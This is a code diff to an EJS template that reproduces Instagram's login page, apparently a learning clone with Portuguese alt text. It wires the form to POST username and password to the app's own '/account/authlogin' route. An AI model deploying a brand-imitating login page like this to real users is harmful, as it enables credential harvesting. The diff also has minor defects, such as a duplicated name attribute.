--- a/views/index.ejs
+++ b/views/index.ejs
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <link rel="stylesheet" href="styles.css" />
+    <link rel="stylesheet" href="/styles.css" />
     <title>Login • Instagram</title>
 </head>
 <body>
@@ -13,16 +13,16 @@
         <section id="auth" class="flex direction-column">
             <div class="panel login flex direction-column">
                 <h1 title="Instagram" class="flex justify-content-center">
-                    <img src="./img//instagram-logo.png" alt="Instagram logo" title="Instagram logo" />
+                    <img src="/instagram-logo.png" alt="Instagram logo" title="Instagram logo" />
                 </h1>
-                <form>
+                <form action="/account/authlogin" method="post">
                     <label for="email" class="sr-only">Phone number, username, or email</label>
-                    <input name="email" placeholder="Phone number, username, or email" />
+                    <input   name="name" placeholder="Phone number, username, or email" />
 
                     <label for="password" class="sr-only">Password</label>
-                    <input name="password" type="password" placeholder="Password" />
+                    <input name="password" name="password" type="password" placeholder="Password" />
 
-                    <button type="button">Log In</button>
+                    <button type="submit">Log In</button>
                 </form>
                 <div class="flex separator align-items-center">
                     <span></span>
@@ -44,8 +44,8 @@
             <div class="app-download flex direction-column align-items-center">
                 <p>Get the app.</p>
                 <div class="flex justify-content-center">
-                    <img src="./img/apple-button.png"      alt="Imagem com a logo da Apple Store" title="Imagem com a logo da Apple Store" />
-                    <img src="./img/googleplay-button.png" alt="Imagem com a logo da Google Play" title="Imagem com a logo da Google Play" />
+                    <img src="/apple-button.png"      alt="Imagem com a logo da Apple Store" title="Imagem com a logo da Apple Store" />
+                    <img src="/googleplay-button.png" alt="Imagem com a logo da Google Play" title="Imagem com a logo da Google Play" />
                 </div>
             </div>
         </section>
